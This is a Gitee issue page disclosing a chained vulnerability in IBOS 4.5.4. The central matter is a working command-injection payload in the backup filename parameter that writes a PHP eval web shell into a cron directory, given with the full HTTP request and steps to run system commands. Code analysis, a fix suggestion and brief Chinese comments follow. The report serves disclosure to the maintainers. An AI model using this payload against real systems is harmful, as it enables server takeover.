677 Star 2K Fork 926

IBOS开源OA协同办公管理/IBOS

 / 详情

Arbitrary file inclusion causes getshell

已完成
创建于  
2020-01-17 20:07

Test environment

os : windows;
IBOS version : IBOS 4.5.4 OPEN

Vulnerability Test

Step-1(Use Command Injection Vulnerability)

use this vulnerability https://gitee.com/ibos/IBOS/issues/I18IIV to write a file on the specified directory.

first,login in to IBOS system and enter the management background.The operation is as follows like this.

test-4

Use burpsuite to grab packets and send them to "Repeater" for modification.Insert payload in parameter filename value.

test-5

Payload

the payload is like this.This payload will generate a file named "zzzzzz" in /system/modules/recruit/cron.

%26cd%20system%26cd%20modules%26cd%20recruit%26cd%20cron%26echo+eval($_GET["test"]);>>zzzzz%26aaa

Packet Data

and the packet is like this.

POST /?r=dashboard/database/backup HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/?r=dashboard/database/backup
Content-Type: application/x-www-form-urlencoded
Content-Length: 316
Connection: close
Cookie: P8Jm_saltkey=vpb6gmPE; PHPSESSID=3mcqdm2dr10tf3lb4cgpnl6ah5; P8Jm_sid=KmI412; P8Jm_autologin=1; P8Jm_lastactivity=1579248371; P8Jm_ulastactivity=480fKnWDRYWQhA5jDvpydR3bYm23jT9YOEmv%2FidCRP372M6FAptj
Upgrade-Insecure-Requests: 1

backuptype=custom&customtables%5B%5D=test_announcement&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=2020-01-17_kRHRRgOk%26cd%20system%26cd%20modules%26cd%20recruit%26cd%20cron%26echo+eval($_GET["test"]);>>zzzzz%26aaa&dbSubmit=1

step-2(Modifying a scheduled task file)

enter scheduled task like this,and modify it.The file name was generate in "step-1",such as "zzzzzz".

test-6

in this function,modify the "Task script" like this and submit it.

test-7

step-3(Run Script)

Then you can run this script like this.

test-7

and use burpsuite function "Repeater" and add the parameter "test" like this,such as "phpinfo()".

test-8

run system command is like this,such as "ipconfig".

test-9

Code analysis

The problematic vulnerability is the file /system/modules/dashboard/controllers/CronController.php and the the function in question is actionIndex() in line 16.

test-1

look at line 40 getRealCronFile() function will form a complete file path.and the line 41 to line 47,this is the string used to filter filename that modify scheduled tasks.

test-2

getRealCronFile() function code.

test-3

In the above code, the save path and file name of the file are guaranteed, but the suffix of the file is not guaranteed, so you can write to arbitrary files to include getshell through other vulnerabilities.

Solution

Should contain a specific type of file in a specified directory, or a specified file.

评论 (5)

c0d1M4x 创建了任务 5年前

这个issue发现的厉害啊 可惜ibos已经不维护了 你是哈尔滨的?

@mahuan 不是滴,广东的,师傅在哈尔滨呀

@c0deCC 是啊 我在哈尔滨 你平时用ibos和yii啊?

@mahuan 平时没怎么用,也只是对ibos做下安全测试

seekArt 任务状态待办的 修改为进行中 5年前

@mahuan 平时没怎么用,也只是对ibos做下安全测试

@c0deCC

感谢提交issue,因个人身体和精力原因,本人已久疏于对此开源仓库的更新,对各位使用的用户十分抱有歉意,若有意向PR和维护,可接受这个邀请。https://gitee.com/ibos/IBOS/invite_link?invite=01b415e2534ea3042efc3e1abcb4a556449e1ef86486475c8b40572f73d50c1ed2d883d557bd3e9863ce7e16acfba504

seekArt 任务状态进行中 修改为已完成 4年前

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(3)
367012 mahuan 1579858226 c0d1M4x-c0deCC 462209 seekart 1578924589
PHP
1
https://gitee.com/ibos/IBOS.git
git@gitee.com:ibos/IBOS.git
ibos
IBOS
IBOS

搜索帮助